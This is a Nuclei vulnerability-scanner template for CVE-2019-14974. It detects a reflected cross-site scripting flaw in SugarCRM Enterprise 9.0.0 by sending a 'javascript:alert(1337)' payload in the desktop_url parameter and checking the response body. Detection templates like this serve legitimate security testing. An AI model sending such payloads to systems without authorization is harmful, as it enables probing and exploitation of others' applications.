nuclei-templates/cves/2019/CVE-2019-14974.yaml

33 lines
961 B
YAML

id: CVE-2019-14974
info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: medium
description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
reference:
- https://www.exploit-db.com/exploits/47247
- https://nvd.nist.gov/vuln/detail/CVE-2019-14974
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-14974
cwe-id: CWE-79
tags: cve2019,xss,sugarcrm,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "url = window.location.search.split(\"?desktop_url=\")[1]"
part: body
# Enhanced by mp on 2022/08/31